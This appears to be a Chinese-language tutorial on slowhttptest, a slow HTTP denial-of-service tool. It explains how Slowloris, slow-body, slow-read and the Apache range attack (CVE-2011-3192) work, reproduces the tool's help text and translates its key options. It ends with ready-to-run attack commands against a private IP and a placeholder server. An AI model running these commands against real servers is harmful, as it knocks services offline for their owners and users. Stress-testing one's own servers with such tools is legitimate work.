slowhttptest
- slowhttptest源码
- SlowHTTPTest是一个高度可定制化的压力测试工具
- 本质上是利用/构造各种特殊的HTTP请求尝试让服务器过载或者拒绝服务
- 可以运行于各大Linux以及windows平台
该软件被主流包管理器支持,可以直接使用apt安装
apt install -y slowhttptest
0x1 原理
slowhttptest依赖HTTP服务的一个基本原理:
- 服务器会在完整的接收HTTP请求后在进行处理
- 如果HTTP请求一直在传输,即使速率很低,服务器也会分配资源用于处理这个请求
- 当大量的低效HTTP请求与服务器建立链接,就会导致拒绝服务
- 基于这个原理的拒绝服务并不会占用服务很高的CPU,只是单纯的拖延服务器时间
攻击细节:
- 目标服务器的接收缓冲区需要比发送缓冲区小,越小越好
- 攻击者攻击的目标应该超出服务器的发送缓冲区大小(通常为64-128KB)
- 可以使用
slowhttptest -k
填满服务器缓冲区
0x2 参数
先使用
-h
查看帮助信息# slowhttptest -h slowhttptest, a tool to test for slow HTTP DoS vulnerabilities - version 1.6 Usage: slowhttptest [options ...] Test modes: -H slow headers a.k.a. Slowloris (default) -B slow body a.k.a R-U-Dead-Yet -R range attack a.k.a Apache killer -X slow read a.k.a Slow Read Reporting options: -g generate statistics with socket state changes (off) -o file_prefix save statistics output in file.html and file.csv (-g required) -v level verbosity level 0-4: Fatal, Info, Error, Warning, Debug General options: -c connections target number of connections (50) -i seconds interval between followup data in seconds (10) -l seconds target test length in seconds (240) -r rate connections per seconds (50) -s bytes value of Content-Length header if needed (4096) -t verb verb to use in request, default to GET for slow headers and response and to POST for slow body -u URL absolute URL of target (http://localhost/) -x bytes max length of each randomized name/value pair of followup data per tick, e.g. -x 2 generates X-xx: xx for header or &xx=xx for body, where x is random character (32) -f content-type value of Content-type header (application/x-www-form-urlencoded) -m accept value of Accept header (text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5) Probe/Proxy options: -d host:port all traffic directed through HTTP proxy at host:port (off) -e host:port probe traffic directed through HTTP proxy at host:port (off) -p seconds timeout to wait for HTTP response on probe connection, after which server is considered inaccessible (5) Range attack specific options: -a start left boundary of range in range header (5) -b bytes limit for range header right boundary values (2000) Slow read specific options: -k num number of times to repeat same request in the connection. Use to multiply response size if server supports persistent connections (1) -n seconds interval between read operations from recv buffer in seconds (1) -w bytes start of the range advertised window size would be picked from (1) -y bytes end of the range advertised window size would be picked from (512) -z bytes bytes to slow read from receive buffer with single read() call (5)
关键参数如下:
-H
:通过header
攻击正常完整的http请求是以\r\n\r\n结尾的,但是slowloris只发送\r\n
-B
:通过body
攻击利用了Content-Length这个参数,声明一个很大的Content-Length,导致body部分发送缓慢
-X
:通过read
攻击向目标服务器发送一个请求,请求一个很大的文件,但是慢速读取响应数据,使得文件长期滞留于目标服务器中,耗尽资源,通过调整TCP窗口大小(很小),使目标服务器慢速返回数据
-R
:通过CVE-2011-3192
进行攻击,主要针对如下apache版本1.3.x
2.0.x -> 2.0.64
2.2.x -> 2.2.19
-u
:指定攻击url-c
:并发攻击数量-g
:生成关键日志-o
:将关键日志保存到文件并且生成html图标报告,需要配合-g
-r
:每秒创建多少链接-w 512 -y 1024
:每个链接初始化syn时设置随机窗口大小为512 -1024
-n 5 -z 32
:每5秒接受32字节的数据-k
:重返因子.自动重放每个攻击请求多少次-p
:设定秒数,等待-p
秒后没有获得服务器数据,判定服务器DoSed
0x3 攻击demo
slowhttptest
的攻击指令格式一般如下slowhttptest -H -u http://10.25.153.231/index.html
根据需求也可以创建暴力型的攻击方式
slowhttptest -c 1000 -X \ -g -o slow_read_stats -r 200 \ -w 512 -y 1024 \ -n 5 -z 32 -k 3 \ -u https://myseceureserver/resources/index.html -p 3
- 每秒创建200个攻击链接,最多1000个攻击链接,每个链接的随机窗口大小为
512->1024
,每5秒接受服务器32字节的数据,每个攻击请求发送三次,服务器连续3秒无响应判定为dos成功
- 每秒创建200个攻击链接,最多1000个攻击链接,每个链接的随机窗口大小为
- 如果使用
-g -o
生成图表那么会生成html文件,看到如下结果: